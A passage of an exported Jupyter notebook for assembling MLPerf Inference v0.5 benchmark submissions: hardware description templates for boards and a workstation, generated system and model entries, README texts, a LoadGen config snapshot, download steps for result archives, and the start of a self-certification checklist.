MP4 (big); Arm Cortex-A53 MP4 (LITTLE)", "host_processors_per_node": "1", "host_processor_core_count": "4 (big); 4 (LITTLE)", "host_processor_frequency": "2360 MHz (big), 1800 MHz (LITTLE)", "host_processor_caches": "L1I$ 256=4x64 KiB, L1D$ 256=4x64 KiB, L2$ 2 MiB (big); L1I$ 128=4x32 KiB, L1D$ 128=4x32 KiB, L2$ 1 MiB (LITTLE)", "host_memory_configuration": "-", "host_memory_capacity": "6 GiB", "host_storage_capacity": "128 GiB", "host_storage_type": "Flash", "host_processor_interconnect": "-", "host_networking": "-", "host_networking_topology": "-", "accelerators_per_node": "1", "accelerator_model_name": "Arm Mali-G72 MP12", "accelerator_frequency": "850 MHz", "accelerator_host_interconnect": "-", "accelerator_interconnect": "-", "accelerator_interconnect_topology": "-", "accelerator_memory_capacity": "6 GiB (shared with host)", "accelerator_memory_configuration": "-", "accelerator_on-chip_memories": "-", "cooling": "phone case", "hw_notes": "https://en.wikichip.org/wiki/hisilicon/kirin/970", "framework": "", "operating_system": "Android 9.1.0.300(C782E5R1P11); kernel 4.9.148 (Sat Jun 29 20:41:06 CST 2019)", "other_software_stack": "Android NDK 17c (LLVM 6.0.2); OpenCL driver 2.0 v1.r14p0-00cet0.0416641283c5d6e2d53c163d0ca99357", "sw_notes": "Powered by Collective Knowledge v1.11.1" } # <a id="templates_rpi4"></a> # ### Raspberry Pi 4 # In[ ]: rpi4 = { "division": "", "submitter": "dividiti", "status": "available", "system_name": "Raspberry Pi 4 (rpi4)", "number_of_nodes": "1", "host_processor_model_name": "Arm Cortex-A72 MP4", "host_processors_per_node": "1", "host_processor_core_count": "4", "host_processor_frequency": "1500 MHz", "host_processor_caches": "L1I$ 128=4x32 KiB, L1D$ 128=4x32 KiB, L2$ 1 MiB", "host_memory_configuration": "-", "host_memory_capacity": "4 GiB", "host_storage_capacity": "128 GiB", "host_storage_type": "SanDisk Extreme Pro microSD", "host_processor_interconnect": "-", "host_networking": "-", "host_networking_topology": "-", "accelerators_per_node": "0", "accelerator_model_name": "-", "accelerator_frequency": "-", "accelerator_host_interconnect": "-", "accelerator_interconnect": "-", "accelerator_interconnect_topology": "-", "accelerator_memory_capacity": "-", "accelerator_memory_configuration": "-", "accelerator_on-chip_memories": "-", "cooling": "http://www.raspberrypiwiki.com/index.php/Armor_Case_B", "hw_notes": "https://www.raspberrypi.org/products/raspberry-pi-4-model-b/specifications/", "framework": "", "operating_system": "Raspbian Buster (Debian 10); kernel 4.19.66-v7l+ #1253 (Thu Aug 15 12:02:08 BST 2019)", "other_software_stack": "GCC 8.3.0; Python 3.7.3", "sw_notes": "Powered by Collective Knowledge v1.11.1" } # <a id="templates_velociti"></a> # ### HP Z640 workstation # In[ ]: velociti = { "division": "", "submitter": "dividiti", "status": "available", "system_name": "HP Z640 G1X62EA workstation (velociti)", "number_of_nodes": "1", "host_processor_model_name": "Intel Xeon CPU E5-2650 v3", "host_processors_per_node": "1", "host_processor_core_count": "10", "host_processor_frequency": "2300 MHz (base); 3000 MHz (turbo)", "host_processor_caches": "L1I$ 10x32 KiB, L1D$ 10x32 KiB; L2$ 10x256 KiB; L3$ 25 MiB", "host_memory_configuration": "DDR4 (max bandwidth 68 GB/s)", "host_memory_capacity": "32 GiB", "host_storage_capacity": "512 GiB", "host_storage_type": "SSD", "host_processor_interconnect": "-", "host_networking": "-", "host_networking_topology": "-", "accelerators_per_node": "1", "accelerator_model_name": "NVIDIA GeForce GTX 1080", "accelerator_frequency": "1607 MHz (base); 1733 MHz (boost)", "accelerator_host_interconnect": "-", "accelerator_interconnect": "-", "accelerator_interconnect_topology": "-", "accelerator_memory_capacity": "8 GiB", "accelerator_memory_configuration": "GDDR5X (max bandwidth 320 GB/s)", "accelerator_on-chip_memories": "20x48 KiB", "cooling": "standard", "hw_notes": "The Intel CPU has reached its end-of-life (EOL). http://h20195.www2.hp.com/v2/default.aspx?cc=ie&lc=en&oid=7528701; https://ark.intel.com/products/81705/Intel-Xeon-Processor-E5-2650-v3-25M-Cache-2_30-GHz; http://www.cpu-world.com/CPUs/Xeon/Intel-Xeon%20E5-2650%20v3.html; http://www.geforce.co.uk/hardware/10series/geforce-gtx-1080/", "framework": "TensorFlow v1.14", "operating_system": "Ubuntu 16.04.6 LTS; kernel 4.4.0-112-generic #135-Ubuntu SMP (Fri Jan 19 11:48:36 UTC 2018)", "other_software_stack": "Driver 430.50; CUDA 10.1; TensorRT 5.1.5; Docker 19.03.3 (build a872fc2); GCC 7.4.0; Python 3.5.2", "sw_notes": "Powered by Collective Knowledge v1.11.4" } # <a id="templates_default"></a> # ### Default # In[ ]: # Default `system_desc_id.json` (to catch uninitialized descriptions) default_system_json = { "division": "reqired", "submitter": "required", "status": "required", "system_name": "required", "number_of_nodes": "required", "host_processor_model_name": "required", "host_processors_per_node": "required", "host_processor_core_count": "required", "host_processor_frequency": "", "host_processor_caches": "", "host_memory_configuration": "", "host_memory_capacity": "required", "host_storage_capacity": "required", "host_storage_type": "required", "host_processor_interconnect": "", "host_networking": "", "host_networking_topology": "", "accelerators_per_node": "required", "accelerator_model_name": "required", "accelerator_frequency": "", "accelerator_host_interconnect": "", "accelerator_interconnect": "", "accelerator_interconnect_topology": "", "accelerator_memory_capacity": "required", "accelerator_memory_configuration": "", "accelerator_on-chip_memories": "", "cooling": "", "hw_notes": "", "framework": "required", "operating_system": "required", "other_software_stack": "required", "sw_notes": "" } # <a id="systems"></a> # ## Systems # In[ ]: # Generate division_systems dictionary. division_systems = {} platform_templates = { 'firefly' : firefly, 'hikey960' : hikey960, 'mate10pro' : mate10pro, 'rpi4' : rpi4, 'velociti' : velociti } divisions = [ 'open', 'closed' ] platforms = [ 'firefly', 'hikey960', 'mate10pro', 'rpi4', 'velociti' ] for division in divisions: for platform in platforms: if platform == 'velociti': libraries = [ 'tensorflow-v1.14', 'tensorrt-v6.0' ] elif platform == 'mate10pro': libraries = [ 'tflite-v1.13', 'armnn-v19.08' ] elif platform == 'rpi4': libraries = [ 'tflite-v1.15.0', 'tflite-v1.15', 'armnn-v19.08' ] else: libraries = [ 'tflite-v1.15', 'armnn-v19.08' ] for library in libraries: if library == 'armnn-v19.08': if platform == 'rpi4': backends = [ 'neon' ] else: backends = [ 'neon', 'opencl' ] library_backends = [ library+'-'+backend for backend in backends ] elif library == 'tensorflow-v1.14': backends = [ 'cpu', 'cuda', 'tensorrt', 'tensorrt-dynamic' ] library_backends = [ library+'-'+backend for backend in backends ] else: library_backends = [ library ] for library_backend in library_backends: division_system = division+'-'+platform+'-'+library_backend frameworks = { 'armnn-v19.08-opencl' : 'ArmNN v19.08 (OpenCL)', 'armnn-v19.08-neon' : 'ArmNN v19.08 (Neon)', 'tflite-v1.13': 'TFLite v1.13.1', 'tflite-v1.15': 'TFLite v1.15.0-rc2', 'tflite-v1.15.0': 'TFLite v1.15.0', 'tensorrt-v6.0' : 'TensorRT v6.0', 'tensorflow-v1.14-cpu': 'TensorFlow v1.14 (CPU)', 'tensorflow-v1.14-cuda': 'TensorFlow v1.14 (CUDA)', 'tensorflow-v1.14-tensorrt': 'TensorFlow v1.14 (TensorRT-static)', 'tensorflow-v1.14-tensorrt-dynamic': 'TensorFlow v1.14 (TensorRT-dynamic)', } if library_backend == 'tensorflow-v1.14-cpu': status = 'RDI' elif library_backend == 'tflite-v1.15.0' or library_backend == 'tensorrt-v6.0': status = 'unofficial' else: status = 'available' template = deepcopy(platform_templates[platform]) template.update({ 'division' : division, 'submitter' : 'dividiti', # 'dividiti' if platform != 'velociti' else 'dividiti, Politecnico di Milano' 'status' : status, 'framework' : frameworks[library_backend] }) if (not library_backend.startswith('tensorrt') and not library_backend.startswith('tensorflow') and not library_backend.endswith('opencl')) or library_backend.endswith('cpu'): template.update({ 'accelerator_frequency' : '-', 'accelerator_memory_capacity' : '-', 'accelerator_memory_configuration': '-', 'accelerator_model_name' : '-', 'accelerator_on-chip_memories': '-', 'accelerators_per_node' : '0', }) division_systems[division_system] = template print("=" * 100) print(division_system) print("=" * 100) pprint(template) print("-" * 100) print("") # <a id="implementations"></a> # ## Implementations # ### Image classification # In[ ]: # Generate implementation_benchmarks dictionary. implementation_benchmarks = {} # Default `system_desc_id_imp.json` (to catch uninitialized descriptions) default_implementation_benchmark_json = { "input_data_types": "required", "retraining": "required", "starting_weights_filename": "required", "weight_data_types": "required", "weight_transformations": "required" } # For each image classification implementation. for implementation in [ 'image-classification-tflite', 'image-classification-armnn-tflite' ]: # Add MobileNet. implementation_mobilenet = implementation+'-'+'mobilenet' implementation_benchmarks[implementation_mobilenet] = { "input_data_types": "fp32", "weight_data_types": "fp32", "retraining": "no", "starting_weights_filename": "https://zenodo.org/record/2269307/files/mobilenet_v1_1.0_224.tgz", "weight_transformations": "TFLite" } # Add MobileNet quantized. implementation_mobilenet_quantized = implementation+'-'+'mobilenet-quantized' implementation_benchmarks[implementation_mobilenet_quantized] = { "input_data_types": "uint8", "weight_data_types": "uint8", "retraining": "no", "starting_weights_filename": "https://zenodo.org/record/2269307/files/mobilenet_v1_1.0_224_quant.tgz", "weight_transformations": "TFLite" } # Add ResNet. implementation_resnet = implementation+'-'+'resnet' implementation_benchmarks[implementation_resnet] = { "input_data_types": "fp32", "weight_data_types": "fp32", "retraining": "no", "starting_weights_filename": "https://zenodo.org/record/2535873/files/resnet50_v1.pb", "weight_transformations": "TF -> TFLite" } # Add any MobileNets-v1,v2 model. def add_implementation_mobilenet(implementation_benchmarks, version, multiplier, resolution, quantized=False): base_url = 'https://zenodo.org/record/2269307/files' if version == 1 else 'https://zenodo.org/record/2266646/files' url = '{}/mobilenet_v{}_{}_{}{}.tgz'.format(base_url, version, multiplier, resolution, '_quant' if quantized else '') benchmark = 'mobilenet-v{}-{}-{}{}'.format(version, multiplier, resolution, '-quantized' if quantized else '') if quantized and (version != 1 or implementation != 'image-classification-tflite'): return if implementation == 'image-classification-tflite': weights_transformations = 'TFLite' elif implementation == 'image-classification-armnn-tflite': weights_transformations = 'TFLite -> ArmNN' else: raise "Unknown implementation '%s'!" % implementation implementation_benchmark = implementation+'-'+benchmark implementation_benchmarks[implementation_benchmark] = { "input_data_types": "uint8" if quantized else "fp32", "weight_data_types": "uint8" if quantized else "fp32", "retraining": "no", "starting_weights_filename": url, "weight_transformations": weights_transformations } return # MobileNet-v1. version = 1 for multiplier in [ 1.0, 0.75, 0.5, 0.25 ]: for resolution in [ 224, 192, 160, 128 ]: add_implementation_mobilenet(implementation_benchmarks, version, multiplier, resolution, quantized=False) add_implementation_mobilenet(implementation_benchmarks, version, multiplier, resolution, quantized=True) # MobileNet-v2. version = 2 for multiplier in [ 1.0, 0.75, 0.5, 0.35 ]: for resolution in [ 224, 192, 160, 128, 96 ]: add_implementation_mobilenet(implementation_benchmarks, version, multiplier, resolution) add_implementation_mobilenet(implementation_benchmarks, version=2, multiplier=1.3, resolution=224) add_implementation_mobilenet(implementation_benchmarks, version=2, multiplier=1.4, resolution=224) for implementation in [ 'image-classification-tensorrt-loadgen-py']: # Add ResNet. implementation_resnet = implementation+'-'+'resnet' implementation_benchmarks[implementation_resnet] = { "input_data_types": "fp32", "weight_data_types": "fp32", "retraining": "no", "starting_weights_filename": "https://zenodo.org/record/2535873/files/resnet50_v1.pb", "weight_transformations": "ONNX -> TensorRT" } # Add MobileNet. implementation_mobilenet = implementation+'-'+'mobilenet' implementation_benchmarks[implementation_mobilenet] = { "input_data_types": "int8", "weight_data_types": "int8", "retraining": "no", "starting_weights_filename": "https://zenodo.org/record/2269307/files/mobilenet_v1_1.0_224.tgz", "weight_transformations": "TF -> TensorRT" } # ### Object detection # In[ ]: object_detection_benchmarks = { 'rcnn-nas-lowproposals' : { "name" : "Faster-RCNN-NAS lowproposals", "url" : "http://download.tensorflow.org/models/object_detection/faster_rcnn_nas_lowproposals_coco_2018_01_28.tar.gz", "width" : 1200, "height" : 1200, }, 'rcnn-resnet50-lowproposals' : { "name" : "Faster-RCNN-ResNet50 lowproposals", "url" : "http://download.tensorflow.org/models/object_detection/faster_rcnn_resnet50_lowproposals_coco_2018_01_28.tar.gz", "width" : 1024, "height" : 600, }, 'rcnn-resnet101-lowproposals' : { "name" : "Faster-RCNN-ResNet101 lowproposals", "url" : "http://download.tensorflow.org/models/object_detection/faster_rcnn_resnet101_lowproposals_coco_2018_01_28.tar.gz", "width" : 1024, "height" : 600, }, 'rcnn-inception-resnet-v2-lowproposals' : { "name" : "Faster-RCNN-Inception-ResNet-v2 lowproposals", "url" : "http://download.tensorflow.org/models/object_detection/faster_rcnn_inception_resnet_v2_atrous_lowproposals_coco_2018_01_28.tar.gz", "width" : 1024, "height" : 600, }, 'rcnn-inception-v2' : { "name" : "Faster-RCNN Inception-v2", "url" : "http://download.tensorflow.org/models/object_detection/faster_rcnn_inception_v2_coco_2018_01_28.tar.gz", "width" : 1024, "height" : 600, }, 'ssd-inception-v2' : { "name" : "SSD-Inception-v2", "url" : "http://download.tensorflow.org/models/object_detection/ssd_inception_v2_coco_2018_01_28.tar.gz", "width" : 300, "height" : 300, }, 'ssd-mobilenet-v1-quantized-mlperf' : { "name" : "MLPerf SSD-MobileNet", "url" : "https://zenodo.org/record/3361502/files/ssd_mobilenet_v1_coco_2018_01_28.tar.gz", "width" : 300, "height" : 300, "provenance" : "Google", }, 'ssd-mobilenet-v1-non-quantized-mlperf' : { "name" : "MLPerf SSD-MobileNet quantized", "url" : "https://zenodo.org/record/3252084/files/mobilenet_v1_ssd_8bit_finetuned.tar.gz", "width" : 300, "height" : 300, "provenance" : "Habana" }, 'ssd-mobilenet-v1-fpn' : { "name" : "SSD-MobileNet-v1 FPN SBP", "url" : "http://download.tensorflow.org/models/object_detection/ssd_mobilenet_v1_fpn_shared_box_predictor_640x640_coco14_sync_2018_07_03.tar.gz", "width" : 640, "height" : 640, }, 'ssd-resnet50-fpn' : { "name" : "SSD-ResNet50-v1 FPN SBP", "url" : "http://download.tensorflow.org/models/object_detection/ssd_resnet50_v1_fpn_shared_box_predictor_640x640_coco14_sync_2018_07_03.tar.gz", "width" : 640, "height" : 640, }, 'ssdlite-mobilenet-v2' : { "name" : "SSDLite-MobileNet-v2", "url" : "http://download.tensorflow.org/models/object_detection/ssdlite_mobilenet_v2_coco_2018_05_09.tar.gz", "width" : 300, "height" : 300, }, 'yolo-v3' : { "name" : "YOLO-v3", "url" : "https://zenodo.org/record/3386327/files/yolo_v3_coco.tar.gz", "width" : 416, "height" : 416, "provenance" : "https://github.com/YunYang1994/tensorflow-yolov3/" } } # For each object detection implementation. for implementation in [ 'mlperf-inference-vision' ]: for benchmark in object_detection_benchmarks.keys(): implementation_benchmark = implementation+'-'+benchmark implementation_benchmarks[implementation_benchmark] = { "input_data_types": "fp32", "weight_data_types": "fp32", "retraining": "no", "starting_weights_filename": object_detection_benchmarks[benchmark]['url'], # "name" : object_detection_benchmarks[benchmark]['name'], # submission checker complains about "unknwon field name" "weight_transformations": "None (TensorFlow)" } from pprint import pprint # pprint(implementation_benchmarks) # In[ ]: implementation_readmes = {} implementation_readmes['image-classification-tflite'] = """# MLPerf Inference - Image Classification - TFLite This C++ implementation uses TFLite to run TFLite models for Image Classification on CPUs. ## Links - [Jupyter notebook](https://nbviewer.jupyter.org/urls/dl.dropbox.com/s/1xlv5oacgobrfd4/mlperf-inference-v0.5-dividiti.ipynb) - [Source code](https://github.com/ctuning/ck-mlperf/tree/master/program/image-classification-tflite-loadgen). - [Instructions](https://github.com/mlperf/inference/blob/master/v0.5/classification_and_detection/optional_harness_ck/classification/tflite/README.md). """ implementation_readmes['image-classification-armnn-tflite'] = """# MLPerf Inference - Image Classification - ArmNN-TFLite This C++ implementation uses ArmNN with the TFLite frontend to run TFLite models for Image Classification on Arm Cortex CPUs and Arm Mali GPUs. ## Links - [Jupyter notebook](https://nbviewer.jupyter.org/urls/dl.dropbox.com/s/1xlv5oacgobrfd4/mlperf-inference-v0.5-dividiti.ipynb) - [Source code](https://github.com/ctuning/ck-mlperf/tree/master/program/image-classification-armnn-tflite-loadgen). - [Instructions](https://github.com/ARM-software/armnn-mlperf/blob/master/README.md). """ implementation_readmes['image-classification-tensorrt-loadgen-py'] = """# MLPerf Inference - Image Classification - TensorRT This Python implementation uses TensorRT to run models Image Classification on Arm Cortex CPUs and Arm Mali GPUs. ### Links - [Source code](https://github.com/ctuning/ck-mlperf/tree/master/program/image-classification-tensorrt-loadgen-py). """ implementation_readmes['mlperf-inference-vision'] = """# MLPerf Inference - Object Detection - TensorFlow This Python implementation is the official MLPerf Inference vision application, modified to support other object detection models and run with TensorRT. ## Links - [CK wrapper](https://github.com/ctuning/ck-object-detection/tree/master/program/mlperf-inference-vision). - [vision_with_ck branch in dividiti's fork of mlperf/inference](https://github.com/dividiti/inference/tree/vision_with_ck). - [Docker image with instructions](https://github.com/ctuning/ck-mlperf/tree/master/docker/mlperf-inference-vision-with-ck.tensorrt.ubuntu-18.04). - [Jupyter notebook](https://nbviewer.jupyter.org/urls/dl.dropbox.com/s/1xlv5oacgobrfd4/mlperf-inference-v0.5-dividiti.ipynb) """ # In[ ]: implementation_paths = {} for implementation in [ 'image-classification-tflite', 'image-classification-armnn-tflite', 'image-classification-tensorrt-loadgen-py', 'mlperf-inference-vision' ]: implementation_uoa = implementation if implementation.startswith('image-classification'): if implementation.endswith('tflite'): implementation_uoa += '-loadgen' repo_uoa = 'ck-mlperf' else: # TODO: move to ck-mlperf, then no need for special case. repo_uoa = 'ck-object-detection' r = ck.access({'action':'find', 'repo_uoa':repo_uoa, 'module_uoa':'program', 'data_uoa':implementation_uoa}) if r['return']>0: print('Error: %s' % r['error']) exit(1) implementation_paths[implementation] = r['path'] # In[ ]: measurements_readmes = {} task = 'image-classification' for division_upper in [ 'Closed', 'Open' ]: division_lower = division_upper.lower() measurements_readmes[division_lower+'-'+task] = '''# MLPerf Inference - {} Division - Image Classification We performed our measurements using automated, customizable, portable and reproducible [Collective Knowledge](http://cknowledge.org) workflows. Our workflows automatically install dependencies (models, datasets, etc.), preprocess input data in the correct way, and so on. ## CK repositories As CK is always evolving, it is hard to pin particular revisions of all repositories. The most relevant repositories and their latest revisions on the submission date (11/Oct/2019): - [ck-mlperf](https://github.com/ctuning/ck-mlperf) @ [ee77cfd](https://github.com/ctuning/ck-mlperf/commit/ee77cfd3ddfa30739a8c2f483fe9ba83a233a000) (contains programs integrated with LoadGen, model packages and scripts). - [ck-env](https://github.com/ctuning/ck-env) @ [f9ac337](https://github.com/ctuning/ck-env/commit/f9ac3372cdc82fa46b2839e45fc67848ab4bac03) (contains dataset descriptions, preprocessing methods, etc.) - [ck-tensorflow](https://github.com/ctuning/ck-tensorflow) @ [eff8bec](https://github.com/ctuning/ck-tensorflow/commit/eff8bec192021162e4a336dbd3e795afa30b7d26) (contains TFLite packages). - [armnn-mlperf](https://github.com/arm-software/armnn-mlperf) @ [42f44a2](https://github.com/ARM-software/armnn-mlperf/commit/42f44a266b6b4e04901255f46f6d34d12589208f) (contains ArmNN/ArmCL packages). ## Links - [Bash script](https://github.com/ctuning/ck-mlperf/tree/master/script/mlperf-inference-v0.5.{}.image-classification) used to invoke benchmarking on Linux systems or Android devices. '''.format(division_upper, division_lower) task = 'object-detection' for division_upper in [ 'Closed', 'Open' ]: division_lower = division_upper.lower() measurements_readmes[division_lower+'-'+task] = '''# MLPerf Inference - {} Division - Object Detection We performed our measurements using automated, customizable, portable and reproducible [Collective Knowledge](http://cknowledge.org) workflows. Our workflows automatically install dependencies (models, datasets, etc.), preprocess input data in the correct way, and so on. ## CK repositories As CK is always evolving, it is hard to pin particular revisions of all repositories. The most relevant repositories and their latest revisions on the submission date (18/Oct/2019): - [ck-mlperf](https://github.com/ctuning/ck-mlperf) @ [ef1fced](https://github.com/ctuning/ck-mlperf/commit/ef1fcedd495fd03b5ad6d62d62c8ba271854f2ad) (contains the CK program wrapper, MLPerf SSD-MobileNet model packages and scripts). - [ck-object-detection](https://github.com/ctuning/ck-object-detection) @ [780d328](https://github.com/ctuning/ck-object-detection/commit/780d3288ec19656cb60c5ad39b2486bbf0fbf97a) (contains most model packages) - [ck-env](https://github.com/ctuning/ck-env) @ [5af9fbd](https://github.com/ctuning/ck-env/commit/5af9fbd93ad6c6465b631716645ad9442a333442) (contains dataset descriptions, preprocessing methods, etc.) ## Links - [Docker image with instructions](https://github.com/ctuning/ck-mlperf/tree/master/docker/mlperf-inference-vision-with-ck.tensorrt.ubuntu-18.04). - [Bash script](https://github.com/ctuning/ck-mlperf/tree/master/script/mlperf-inference-v0.5.{}.object-detection) used to invoke benchmarking via the Docker image. '''.format(division_upper, division_lower) # In[ ]: # Snapshot of https://github.com/dividiti/inference/blob/61220457dec221ed1984c62bd9d382698bd71bc6/v0.5/mlperf.conf mlperf_conf_6122045 = ''' # The format of this config file is 'key = value'. # The key has the format 'model.scenario.key'. Value is mostly int64_t. # Model maybe '*' as wildcard. In that case the value applies to all models. # All times are in milli seconds *.SingleStream.target_latency = 10 *.SingleStream.target_latency_percentile = 90 *.SingleStream.min_duration = 60000 *.SingleStream.min_query_count = 1024 *.MultiStream.target_qps = 20 *.MultiStream.target_latency_percentile = 99 *.MultiStream.samples_per_query = 4 *.MultiStream.max_async_queries = 1 *.MultiStream.target_latency = 50 *.MultiStream.min_duration = 60000 *.MultiStream.min_query_count = 270336 ssd-resnet34.MultiStream.target_qps = 15 ssd-resnet34.MultiStream.target_latency = 66 gnmt.MultiStream.min_query_count = 90112 gnmt.MultiStream.target_latency = 100 gnmt.MultiStream.target_qps = 10 gnmt.MultiStream.target_latency_percentile = 97 *.Server.target_qps = 1.0 *.Server.target_latency = 10 *.Server.target_latency_percentile = 99 *.Server.target_duration = 0 *.Server.min_duration = 60000 *.Server.min_query_count = 270336 resnet50.Server.target_latency = 15 ssd-resnet34.Server.target_latency = 100 gnmt.Server.min_query_count = 90112 gnmt.Server.target_latency = 250 gnmt.Server.target_latency_percentile = 97 *.Offline.target_qps = 1.0 *.Offline.target_latency_percentile = 90 *.Offline.min_duration = 60000 *.Offline.min_query_count = 1 ''' # <a id="get"></a> # ## Get the experimental data # Download experimental data and add CK repositories as follows. # <a id="get_image_classification_closed"></a> # ### Image Classification - Closed (MobileNet, ResNet) # #### `firefly` # ``` # $ wget https://www.dropbox.com/s/3md826fk7k1taf3/mlperf.closed.image-classification.firefly.tflite-v1.15.zip # $ ck add repo --zip=mlperf.closed.image-classification.firefly.tflite-v1.15.zip # # $ wget https://www.dropbox.com/s/jusoz329mhixpxm/mlperf.closed.image-classification.firefly.armnn-v19.08.neon.zip # $ ck add repo --zip=mlperf.closed.image-classification.firefly.armnn-v19.08.neon.zip # # $ wget https://www.dropbox.com/s/08lzbz7jl2w5jhu/mlperf.closed.image-classification.firefly.armnn-v19.08.opencl.zip # $ ck add repo --zip=mlperf.closed.image-classification.firefly.armnn-v19.08.opencl.zip # ``` # #### `hikey960` # ``` # $ wget https://www.dropbox.com/s/lqnffl6wbaeceul/mlperf.closed.image-classification.hikey960.tflite-v1.15.zip # $ ck add repo --zip=mlperf.closed.image-classification.hikey960.tflite-v1.15.zip # # $ wget https://www.dropbox.com/s/6m6uv1d33yc82f8/mlperf.closed.image-classification.hikey960.armnn-v19.08.neon.zip # $ ck add repo --zip=mlperf.closed.image-classification.hikey960.armnn-v19.08.neon.zip # # $ wget https://www.dropbox.com/s/bz56y4damfqggr8/mlperf.closed.image-classification.hikey960.armnn-v19.08.opencl.zip # $ ck add repo --zip=mlperf.closed.image-classification.hikey960.armnn-v19.08.opencl.zip # ``` # #### `rpi4` # ``` # $ wget https://www.dropbox.com/s/ig97x9cqoxfs3ne/mlperf.closed.image-classification.rpi4.tflite-v1.15.zip # $ ck add repo --zip=mlperf.closed.image-classification.rpi4.tflite-v1.15.zip # # $ wget https://www.dropbox.com/s/ohcuyes409h66tx/mlperf.closed.image-classification.rpi4.armnn-v19.08.neon.zip # $ ck add repo --zip=mlperf.closed.image-classification.rpi4.armnn-v19.08.neon.zip # ``` # #### `mate10pro` # ``` # $ wget https://www.dropbox.com/s/r7hss1sd0268b9j/mlperf.closed.image-classification.mate10pro.armnn-v19.08.neon.zip # $ ck add repo --zip=mlperf.closed.image-classification.mate10pro.armnn-v19.08.neon.zip # # $ wget https://www.dropbox.com/s/iflzxbxcv3qka9x/mlperf.closed.image-classification.mate10pro.armnn-v19.08.opencl.zip # $ ck add repo --zip=mlperf.closed.image-classification.mate10pro.armnn-v19.08.opencl.zip # ``` # **NB:** We aborted the ResNet accuracy experiment with TFLite, as it was estimated to take 17 hours. # #### `mate10pro` (only for testing the checker) # ##### BAD_LOADGEN # ``` # $ wget https://www.dropbox.com/s/nts8e7unb7vm68f/mlperf.closed.image-classification.mate10pro.tflite-v1.13.mobilenet.BAD_LOADGEN.zip # $ ck add repo --zip=mlperf.closed.image-classification.mate10pro.tflite-v1.13.mobilenet.BAD_LOADGEN.zip # ``` # ##### BAD_RESNET # ``` # $ wget https://www.dropbox.com/s/bi2owxxpcfm6n2s/mlperf.closed.image-classification.mate10pro.armnn-v19.08.opencl.BAD_RESNET.zip # $ ck add repo --zip=mlperf.closed.image-classification.mate10pro.armnn-v19.08.opencl.BAD_RESNET.zip # # $ wget https://www.dropbox.com/s/t2o2elqdyitqlpi/mlperf.closed.image-classification.mate10pro.armnn-v19.08.neon.BAD_RESNET.zip # $ ck add repo --zip=mlperf.closed.image-classification.mate10pro.armnn-v19.08.neon.BAD_RESNET.zip # ``` # <a id="get_image_classification_open"></a> # ### Image Classification - Open (MobileNets-v1,v2) # #### `firefly` # ``` # $ wget https://www.dropbox.com/s/q8ieqgnr3zn6w4y/mlperf.open.image-classification.firefly.tflite-v1.15.zip # $ ck add repo --zip=mlperf.open.image-classification.firefly.tflite-v1.15.zip # # $ wget https://www.dropbox.com/s/zpenduz1i4qt651/mlperf.open.image-classification.firefly.tflite-v1.15.mobilenet-v1-quantized.zip # $ ck add repo --zip=mlperf.open.image-classification.firefly.tflite-v1.15.mobilenet-v1-quantized.zip # # $ wget https://www.dropbox.com/s/3mmefvxc15m9o5b/mlperf.open.image-classification.firefly.armnn-v19.08.opencl.zip # $ ck add repo --zip=mlperf.open.image-classification.firefly.armnn-v19.08.opencl.zip # # $ wget https://www.dropbox.com/s/hrupp4o4apo3dfa/mlperf.open.image-classification.firefly.armnn-v19.08.neon.zip # $ ck add repo --zip=mlperf.open.image-classification.firefly.armnn-v19.08.neon.zip # ``` # #### `hikey960` # ``` # $ wget https://www.dropbox.com/s/2gbbpsd2pjurvc8/mlperf.open.image-classification.hikey960.tflite-v1.15.zip # $ ck add repo --zip=mlperf.open.image-classification.hikey960.tflite-v1.15.zip # # $ wget https://www.dropbox.com/s/rmttjnxzih9snzh/mlperf.open.image-classification.hikey960.tflite-v1.15.mobilenet-v1-quantized.zip # $ ck add repo --zip=mlperf.open.image-classification.hikey960.tflite-v1.15.mobilenet-v1-quantized.zip # # $ wget https://www.dropbox.com/s/m5illg8i2tse5hg/mlperf.open.image-classification.hikey960.armnn-v19.08.opencl.zip # $ ck add repo --zip=mlperf.open.image-classification.hikey960.armnn-v19.08.opencl.zip # # $ wget https://www.dropbox.com/s/3cujqfe4ps0g66h/mlperf.open.image-classification.hikey960.armnn-v19.08.neon.zip # $ ck add repo --zip=mlperf.open.image-classification.hikey960.armnn-v19.08.neon.zip # ``` # #### `rpi4` # ``` # $ wget https://www.dropbox.com/s/awhdqjq3p4tre2q/mlperf.open.image-classification.rpi4.tflite-v1.15.zip # $ ck add repo --zip=mlperf.open.image-classification.rpi4.tflite-v1.15.zip # # $ wget https://www.dropbox.com/s/rf8vsg5firhjzf8/mlperf.open.image-classification.rpi4.tflite-v1.15.mobilenet-v1-quantized.zip # $ ck add repo --zip=mlperf.open.image-classification.rpi4.tflite-v1.15.mobilenet-v1-quantized.zip # # $ wget https://www.dropbox.com/s/0oketvqml7gyzl0/mlperf.open.image-classification.rpi4.armnn-v19.08.neon.zip # $ ck add repo --zip=mlperf.open.image-classification.rpi4.armnn-v19.08.neon.zip # ``` # #### `mate10pro` # ``` # $ wget https://www.dropbox.com/s/avi6h9m2demz5zr/mlperf.open.image-classification.mate10pro.tflite-v1.13.mobilenet.zip # $ ck add repo --zip=mlperf.open.image-classification.mate10pro.tflite-v1.13.mobilenet.zip # # $ wget https://www.dropbox.com/s/soaw27zcjb8hhww/mlperf.open.image-classification.mate10pro.tflite-v1.13.mobilenet-v1-quantized.zip # $ ck add repo --zip=mlperf.open.image-classification.mate10pro.tflite-v1.13.mobilenet-v1-quantized.zip # ``` # **NB:** `mate10pro.tflite-v1.13.mobilenet` would have been a perfectly valid closed submission, just finished a little bit late after the deadline. `mate10pro.tflite-v1.13.mobilenet-quantized` is an open submission alright, as dividiti hadn't declared submitting quantized results before the deadline. # <a id="get_object_detection_open"></a> # ### Object Detection - Open # #### `velociti` # ``` # $ wget https://www.dropbox.com/s/wiea3a8zf077jsv/mlperf.open.object-detection.velociti.zip # $ ck add repo --zip=mlperf.open.object-detection.velociti.zip # ``` # <a id="checklist"></a> # ## Generate the submission checklist # In[ ]: checklist_template = """MLPerf Inference 0.5 Self-Certification Checklist Name of Certifying Engineer(s): %(name)s Email of Certifying Engineer(s): %(email)s Name of System(s) Under Test: %(system_name)s Division (check one): - [%(open)s] Open - [%(closed)s] Closed Category (check one): - [%(category_available)s] Available - [%(category_preview)s] Preview - [%(category_rdi)s] Research, Development, and Internal (RDI) Benchmark (check one): - [%(benchmark_mobilenet)s] MobileNet - [ ] SSD-MobileNet - [%(benchmark_resnet)s] ResNet - [ ] SSD-1200 - [ ] NMT - [%(benchmark_other)s] Other, please specify: %(benchmark_other_specify)s Please fill in the following tables adding lines as necessary: 97%%-tile latency is required for NMT only. 